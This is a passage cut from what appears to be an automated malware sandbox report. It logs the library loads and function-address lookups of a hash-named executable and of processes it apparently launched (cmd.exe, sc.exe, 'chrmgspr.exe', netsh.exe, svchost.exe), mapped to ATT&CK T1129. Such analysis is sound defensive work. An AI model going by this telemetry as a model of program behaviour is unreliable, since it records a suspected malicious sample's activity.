\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005760)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006072)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006072)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006072)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006072)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00006128)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00006128)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006128)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006128)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006128)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006128)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004084)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004288)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004288)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00004144)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00004144)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004144)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004144)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004144)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 